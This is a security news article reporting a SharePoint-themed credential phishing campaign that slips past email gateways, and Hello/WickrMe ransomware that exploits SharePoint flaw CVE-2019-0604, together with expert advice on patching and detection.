A phishing campaign, discovered by researchers at Cofense, is draping itself in a Microsoft Office SharePoint theme and successfully bypassing security email gateways (SEGs). In a post on Tuesday, the firm said that this is an example of why it’s not always prudent to share documents via Microsoft’s hugely popular, widely used SharePoint collaboration platform.
The phish is targeting Office 365 users with a legitimate-looking SharePoint document that claims to urgently need an email signature. The campaign cropped up in a spot that’s supposed to be protected by Microsoft’s own SEG. This isn’t the first time that we’ve seen the SEG sanctuary get polluted:: In December, spearphishers spoofed Microsoft.com itself to target 200 million Office 365 users, successfully slipping past SEG controls due to Microsoft’s reported failure to enforce domain-based message authentication, reporting & conformance (DMARC): an email authentication protocol built specifically to stop exact domain spoofing (SPF/DKIM).
As this image of the text in the phishing email shows, the spelling and grammar used in the boobytrapped message aren’t the most egregious, atrociously spelled, syntactically bizarre giveaways you can find in these kinds of phishing campaigns. But then again, it’s probably safe to assume that any SharePoint message that asks you to “response urgently” isn’t coming from a native speaker.
The mere fact that the message presses urgency on its recipients should be a tip-off, of course: “Rush-rush” is a typical phishing ploy. Cofense notes that other red flags include the fact that the user’s name isn’t apparent in the opening message: an indication that it’s a mass-distribution campaign intended to reach many targets.
As well, when recipients hover over the hyperlink, they’ll see hide nor hair of any reference to Microsoft. Those who click on the link will instead be shuffled over to the landing page shown below, which display’s Microsoft’s SharePoint logo and the “Pending file” notification in front of a blurry background and a request for the intended victim to log in to view the document. That “could suffice for threat actors to extract and harvest users’ personal data,” Cofense says. If and when credentials are handed over, the campaign redirects the user to a spoofed, unrelated document, “which might be enough to trick the user into thinking this is a legitimate transaction,” Cofense says.
In its X-Force Threat Activity Report, IBM labelled the phish a high-risk threat and gave these recommendations:
- Ensure anti-virus software and associated files are up to date.
- Search for existing signs of the indicated incidents of compromise (IoCs) in your environment.
- Consider blocking and/or setting up detection for all URL and IP based IoCs.
- Keep applications and operating systems running at the current released patch level.
- Exercise caution with attachments and links in emails.
Though it’s high risk, this phishing campaign is basically just another story of a malicious actor putting up bogus material that looks legitimate in order to lure users into clicking, in the hopes of obtaining credentials. Don’t shrug it off, though: it’s yet another attack against SharePoint servers, which have now joined the roster of network devices – including much-bedeviled Microsoft Exchange email servers, SonicWall gateways and Pulse Secure gateways – that are being used by ransomware gangs to jimmy open enterprise networks.
Which brings us to ransomware: the second slap in the double-SharePoint whammy:
Ransomware Gang Pings the Pain Via Wickr
It’s a fairly new variant, first spotted in January by Pondurance. Analysts are calling it two names: Hello, since some samples use .hello as an extension; or WickrMe, since the gang that’s pushing it are using the Wickr encrypted instant messaging service to try to shake down victims for ransom.
The attackers are using a dusty Microsoft SharePoint 2019 vulnerability (CVE-2019-0604) to pry their way into victims’ networks. From there, they’re using Cobalt Strike to pivot to the domain controller and launch ransomware attacks.
CVE-2019-0604 is a high-severity CVE that can lead to remote code-execution. Microsoft patched the flaw in March 2019, but nonetheless, there seems to be no end to the attacks that have used it to penetrate unpatched servers since then. One example: Microsoft warned in October 2020 that Iranian nation-state actors were using CVE-2019-0604 to exploit remotely unpatched servers and to then implant a web shell to gain persistent access and code execution. Following the web shell installation, an attacker deploys Cobalt Strike – a commercially available penetration-testing tool that they later use to install a backdoor that lets them run automated PowerShell script, which eventually download and install the final payload: the Hello/Wickr ransomware.
Jeff Costlow, CISO of ExtraHop, told Threatpost on Wednesday that the ransomware attacks against the 2019 vulnerability affecting SharePoint servers are the more insidious threat in the double whammy, in that they install remote control software and thus allow direct access to the infrastructure where attackers can freely frolic.
“The common thread is the SharePoint server,” Costlow said in an email. “Anyone using SharePoint needs to ensure that they are patching any instances of SharePoint to avoid the malware/ransomware installations. Long term, no amount of patching will solve the phishing problem. It’s too easy for attackers to build sites that mimic legitimate sites. We need to rethink how sharing is done. Security teams need to take a proactive stance to help their users conduct business safely. There are various tactics to help alert users to possible attacks, such as setting up each SharePoint server to use a familiar background or image for users to ensure that they only input credentials on legitimate sites.”
Two Separate SharePoint Jabs
Cofense told Threatpost in an email on Wednesday morning that there’s no apparent connection between the SharePoint phishing campaign that its analysts uncovered and the Wickr/Hello ransomware gang’s ongoing exploitation of SharePoint server vulnerabilities.
But one expert noted that there’s a monotonous regularity in the pattern that these attacks follow: First we get the news about a vulnerability, then it gets jumped on by attackers looking for the sitting ducks of unpatched servers.
In an email to Threatpost on Wednesday, Avihai Ben-Yossef, CTO and co-founder of Cymulate, said that we’ve seen this happen over and over. “In the last year, we see a repetitious pattern in such attacks. A zero-day is taken advantage of by a nation-state actor,” he said. “The affected company – in this case, Microsoft – announces the vulnerability and subsequently patches it. Then other nation-state actors learning about the vulnerability subsequently launch attacks on those who have not patched. Finally, the criminal ransomware attackers come in, socialize the exploit on Dark Net sites and use it … to launch their own attacks. The double-SharePoint whammy is the fact that nation state actors used it first as a zero day (and then as a known vulnerability). Then ransomware actors came in and used it as well.
“The idea is to know what kind of problems you have and where,” he said. “If you don’t know, you can’t protect yourself. Organizations must develop a better response capability to track these announcements and threat intelligence and patch quicker.”
Join Threatpost for “Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks” – a LIVE roundtable event on Wed, May 12 at 2:00 PM EDT. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and Register HERE for free.